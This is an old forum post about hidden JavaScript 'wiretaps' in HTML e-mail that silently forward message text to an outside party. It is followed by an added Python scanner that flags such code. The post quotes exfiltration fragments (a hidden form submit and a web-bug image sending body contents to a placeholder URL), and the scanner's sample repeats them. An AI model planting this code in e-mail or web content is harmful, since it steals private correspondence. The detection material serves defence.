surrealchereal
03-07-2001, 03:12 PM
Recently, the Privacy Foundation announced that a simple, hidden JavaScript code segment in HTML-formatted e-mail messages can effectively allow someone to monitor all succeeding messages that are forwarded with the original message included. Clearly, this can cause confidential internal communications to be compromised. Here's a look at how to identify wiretaps and protect yourself from them.
The Privacy Foundation
The Privacy Foundation at the University of Denver conducts research into communications technologies and provides the public with tools to maintain privacy in the information age. You can read the Foundation's report and commentary on e-mail wiretaps. The report cites the following possible uses for this security breach:
The wiretaps can provide the ability to monitor the path of a confidential e-mail message and the written comments attached.
In a business negotiation conducted via e-mail, one side can learn inside information from the other side as the proposal is discussed through the recipient company's internal e-mail system.
A bugged e-mail message can capture thousands of e-mail addresses as the forwarded message is sent around the world.
Commercial entities, particularly those based offshore, may seek to offer e-mail wiretapping as a service.
This security problem is a particularly dangerous one for organizations that conduct conversations containing sensitive internal information via e-mail. The usual scenario for such communication is that a message from an outside source is forwarded from executive to executive within a company, and it includes each person's comments. If there's an e-mail wiretap on the original external document, each time someone forwards the message to someone else, a copy of their message is automatically and invisibly e-mailed to the original sender of the external message (or someone designated by them).
This problem affects only HTML-enabled e-mail readers that have JavaScript turned on by default, such as Microsoft Outlook, Outlook Express, and Netscape Communicator 6. Eudora and AOL 6.0 are not affected, nor are Web mail services such as Yahoo and Hotmail.
How to identify a wiretap
Some people have known about this problem since 1998, when a computer engineer from the University of Washington pointed out the fault to Microsoft, which apparently did nothing about it. Thus, you might want to inspect any extremely sensitive or confidential e-mails that have been passed around your company since 1998. This is especially important for e-mails that include forwards of messages that originated outside your company, although insiders can also use this technology to snoop on other employees.
To check your messages for an e-mail wiretap, you need to open the message and view its source code. This is accomplished differently in each e-mail client, and I would suggest looking at the help files if you can't figure out how to do this. Once you're viewing the source code, here's what to look for. The initial code that JavaScript uses to read the document is:
"contents + document.body.innerHTML;"
One way to send this information is:
"document.hiddenForm.message.value = contents;
document.hiddenForm.submit();"
This puts the data in a form and transmits it. If your browser warns of form submission activity, you can easily detect this. But if the following code is used instead, the message content can be sent almost undetectably via WebBug:
"webBug = new Image();
webBug.src = baseURL + "?message=" + escape(contents);"
More code is required, but if you find these code segments, you should investigate further based on the information in the Privacy Organization's report. Remember, though: If the sender got the HTML file from another source, he or she may be transmitting the wiretap unknowingly.
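The manual source check described above can be run over stored messages in bulk. The following is an added example, not code from the original post or the Privacy Foundation report: it decodes each text/html part and flags the script fragments quoted in the article. The indicator labels, function names and sample message are constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
# Script fragments the article says to look for (labels are illustrative).
INDICATORS = {
    "reads-body": re.compile(r"document\s*\.\s*body\s*\.\s*innerHTML"),
    "form-submit": re.compile(r"\.\s*submit\s*\("),
    "image-object": re.compile(r"new\s+Image\s*\("),
    "src-query": re.compile(r"\.src\s*=[^;\n]*\?"),
}

class ScriptCollector(HTMLParser):
    """Collects the text of every <script> element."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def scan_message(raw):
    """Return sorted indicator labels found in script code of HTML parts."""
    found = set()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            # decode=True undoes quoted-printable/base64, where "=" is "=3D"
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            collector = ScriptCollector()
            collector.feed(body)
            collector.close()
            for code in collector.scripts:
                found |= {k for k, rx in INDICATORS.items() if rx.search(code)}
    return sorted(found)

# Constructed sample: quoted-printable HTML mail with the article's fragments.
SAMPLE = """From: sender@example.com
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

<html><body><script>contents + document.body.innerHTML;
webBug =3D new Image();
webBug.src =3D baseURL + "?message=3D" + escape(contents);</script></body></html>
"""
print(scan_message(SAMPLE))
```

A hit only marks a message for the closer review the article recommends; script assembled from string fragments or loaded from another location would not match these patterns.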